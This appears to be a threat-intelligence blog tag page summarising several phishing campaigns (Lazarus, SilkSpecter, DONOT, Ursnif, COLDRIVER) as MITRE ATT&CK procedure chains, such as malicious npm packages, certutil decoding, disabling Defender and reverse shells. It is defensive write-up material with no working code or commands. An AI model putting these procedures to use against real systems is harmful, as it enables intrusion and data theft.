T1566.001 – Page 2 – D E C E I V E R . I O

Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure

T1566.001 – The attacker sends a phishing email containing a malicious link to a GitHub repository disguised as a legitimate project.

T1133 – The attacker hosts malicious code, disguised as an NPM package, on a public GitHub repository.

T1059.003 – The victim, a developer, uses the npm install command to install the malicious NPM package from the GitHub repository.

T1543 – The malicious NPM package contains a script that executes a malicious JavaScript file (‘test.js’) located in the ‘.vscode’ folder, establishing persistence on the victim’s machine.

T1071.001 – The malicious JavaScript file uses the cURL command to communicate with the attacker’s C2 server over HTTP to download additional payloads.

T1041 – The attacker uses the established C2 channel to exfiltrate sensitive data from the victim’s machine.

Lazarus Lure in Yacht club

The Lazarus group is conducting a spearphishing campaign targeting individuals involved in the maritime industry, particularly yacht and luxury vessel sales, using malicious attachments to deliver malware.

China shopping for Black Friday Gains

SilkSpecter actors are targeting online shoppers during the Black Friday period with spearphishing emails containing malicious attachments. These attachments likely contain obfuscated malware designed to evade detection and exfiltrate sensitive information like credit card details.

Financially Motivated Chinese Threat Actor SilkSpecter Targeting Black Friday Shoppers

SilkSpecter used spearphishing emails with malicious attachments (T1566) to target Black Friday shoppers.
The attachments likely contained malware, which, when executed, established a connection to the threat actor’s command-and-control (C2) server using common protocols like HTTP or HTTPS (T1071).
This allowed the attackers to steal sensitive information like credit card details and personally identifiable information (PII) and send it back to their C2 server (T1041).

DONOT Hunt Me

A threat actor is utilizing spearphishing emails with malicious attachments to gain initial access, establish persistence via scheduled tasks, and exfiltrate data over HTTP.

DONOT APT Attack

The attacker sends a spearphishing email containing a malicious Office document that exploits the vulnerability CVE-2017-11882.
Upon opening the document, the exploit triggers, allowing the attacker to execute a command that launches the next stage of the attack.
A scheduled task named “Schedule” is created to execute a malicious DLL file via rundll32.exe every 5 minutes, ensuring persistence.
The scheduled task establishes communication with the attacker’s command-and-control (C2) server using the HTTP protocol.
The attacker sends commands and exfiltrates data over the established C2 channel.

Ursnif Trojan – Stealthy Memory Execution

T1566.001 – Attackers send emails containing a malicious LNK file disguised as a PDF document, likely targeting business professionals in the United States.

T1140 – The LNK file uses certutil.exe to decode a Base64-encoded payload.

T1562.004 – The malware uses PowerShell commands to disable Windows Defender.

T1059.003 – The decoded payload is executed using cmd.exe, leading to the execution of the Ursnif banking Trojan.

T1071.001 – The malware establishes communication with a command-and-control (C2) server using web protocols, likely HTTP or HTTPS.

T1041 – The malware exfiltrates stolen sensitive information, such as banking credentials and personal data, to the C2 server.

COLDRIVER – SPICA malware

APT group Coldriver uses spearphishing to deliver malware via PDFs as lure documents.

COLDRIVER – UNC4057, Star Blizzard and Callisto

The attacker, impersonating experts or affiliates, sends a phishing link or document containing a link to a “decryption” utility. This utility is malware (SPICA backdoor) that gives the attacker access to the victim’s machine. The malware establishes persistence, communicates with a C2 server using JSON over WebSockets, and then collects and exfiltrates data.

The Bear and the Shell

T1566.001 – Procedure: The adversary sent spearphishing emails to individuals and organizations critical of the Russian government, using lures such as NASA job offers and articles from independent Russian media outlets. The emails contained malicious ZIP files with LNK files disguised as PDFs. When opened, these executed a PowerShell script to install a reverse shell.

T1059.001 – Procedure: The LNK file, when opened, executes a PowerShell script that decodes and executes a Base64-encoded command. This command downloads and installs the HTTP-Shell, a multiplatform reverse shell.

T1036 – Procedure: The adversary used a NASA-themed lure and designed the command-and-control server to resemble a legitimate PDF editing site to avoid detection.

T1071.001 – Procedure: The HTTP-Shell uses web protocols (HTTP) to communicate with the command-and-control server, enabling the adversary to send commands and receive data.

T1041 – Procedure: The HTTP-Shell allows the adversary to upload and download files, likely facilitating the exfiltration of data from the victim’s machine over the established command-and-control channel.

Tag: T1566.001

Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure

Lazarus Lure in Yacht club

China shopping for Black Friday Gains

Financially Motivated Chinese Threat Actor SilkSpecter Targeting Black Friday Shoppers

DONOT Hunt Me

DONOT APT Attack

Ursnif Trojan – Stealthy Memory Execution

COLDRIVER – SPICA malware

COLDRIVER – UNC4057, Star Blizzard and Callisto

The Bear and the Shell

ORION Detlab: Forging Resilient Detections in the HEFAISTOS Ecosystem

The Maieutic Engine: Birth of a New Detection Engineering Paradigm

The Forge, The Guide, and The Hunter: Unifying Detection Engineering with the Mythological Triad of HEFAISTOS, KEDALION, and ORION

Dendrite: Bridging the Synaptic Gap Between External Intelligence and Internal Defense